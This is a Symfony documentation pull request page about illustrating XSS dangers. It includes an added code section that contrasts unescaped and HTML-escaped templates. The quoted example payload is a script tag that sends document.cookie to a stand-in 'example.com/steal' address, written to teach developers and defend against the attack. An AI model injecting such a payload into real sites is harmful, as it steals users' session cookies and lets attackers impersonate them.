
Add a better example of the dangers of XSS attacks #19805


Merged
merged 1 commit into from
Apr 23, 2024

Conversation

javiereguiluz
Member

I can merge this myself ... but if other maintainers want to do it, keep in mind that there are new occurrences of "XSS attacks" in upper branches that must be updated to link to the new section.

@OskarStark
Contributor

I can merge this myself ... but if other maintainers want to do it, keep in mind that there are new occurrences of "XSS attacks" in upper branches that must be updated to link to the new section.

Go ahead then 😄


My Name
<script type="text/javascript">
document.write('<img src="https://example.com/steal?cookie=' + encodeURIComponent(document.cookie) + '" style="display:none;">');
Contributor


What about using a route with things like /delete/post/1?
So the reader gets the critical idea of having a page make an external action, not only query things?

Member Author


I don't like this idea because it's mixing two different things: XSS attacks are one thing and creating/deleting resources with GET HTTP methods is a different problem. But thanks anyway for reviewing and commenting.

example seems harmless, the attacker could write more advanced JavaScript code
to perform malicious actions.
You'll see ``My Name`` on screen but the attacker just secretly stole your cookies
so they can impersonate you in other websites. This is known as a `Cross-Site Scripting`_
Member


Suggested change
so they can impersonate you in other websites. This is known as a `Cross-Site Scripting`_
so they can impersonate you on other websites. This is known as a `Cross-Site Scripting`_

Member Author


Fixed while merging. Thanks!
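The cookie-stealing ``<script>`` payload discussed in this PR only works because the value typed into the form is copied into the page markup unescaped. The following is an added example, not code from the Symfony docs or from this PR: it takes that same payload (reproduced here as constructed input), renders it through a hypothetical unescaped template and through one that HTML-escapes every interpolated value (the five-character set PHP's ``htmlspecialchars`` with ``ENT_QUOTES`` handles, which is what a template engine's HTML autoescaping applies for you), and checks which output still carries a live script element. The function and variable names are assumptions for the illustration.

```javascript
// Added example (not from the Symfony docs or this PR): the PR's XSS payload
// rendered by an unescaped template versus an HTML-escaped one.

// Attacker-controlled "name" taken from the PR's example. Constructed input.
const PAYLOAD =
  'My Name<script type="text/javascript">' +
  "document.write('<img src=\"https://example.com/steal?cookie=' + " +
  "encodeURIComponent(document.cookie) + '\" style=\"display:none;\">');" +
  '</script>';

// Escape the characters that change meaning inside an HTML text node or a
// quoted attribute value: & < > " '.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable renderer (hypothetical): the value is concatenated into the
// markup as-is, so the browser parses the injected <script> as code.
function renderUnsafe(name) {
  return `<p>Hello ${name}</p>`;
}

// Hardened renderer (hypothetical): the same template, but every interpolated
// value goes through escapeHtml first; the payload becomes visible text.
function renderSafe(name) {
  return `<p>Hello ${escapeHtml(name)}</p>`;
}

// Demonstration-only check: does the output still contain a <script> start
// tag? Real detection needs an HTML parser, not a regex; this is enough to
// contrast the two renderers.
function containsScriptElement(html) {
  return /<script\b/i.test(html);
}

// Render the payload both ways and report which output would execute it.
function demo(name = PAYLOAD) {
  const unsafe = renderUnsafe(name);
  const safe = renderSafe(name);
  return {
    unsafeLeaks: containsScriptElement(unsafe), // true: script runs
    safeLeaks: containsScriptElement(safe),     // false: shown as text
    unsafeOutput: unsafe,
    safeOutput: safe,
  };
}

const result = demo();
console.log('unescaped template executes attacker script:', result.unsafeLeaks);
console.log('escaped template executes attacker script:  ', result.safeLeaks);
console.log(result.safeOutput);
```

Two caveats a reader of the new docs section should keep in mind. Escaping is context-specific: the table above is correct for HTML text and quoted attributes, but a value placed inside a ``<script>`` block, a URL, or a CSS rule needs a different encoder. And marking the session cookie ``HttpOnly`` stops this particular payload from reading ``document.cookie``, but it does not stop XSS itself; the injected script can still issue requests as the logged-in user from inside the page.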

@javiereguiluz javiereguiluz merged commit ba663de into symfony:5.4 Apr 23, 2024
3 checks passed
@javiereguiluz javiereguiluz deleted the xss_example branch April 26, 2024 15:47

5 participants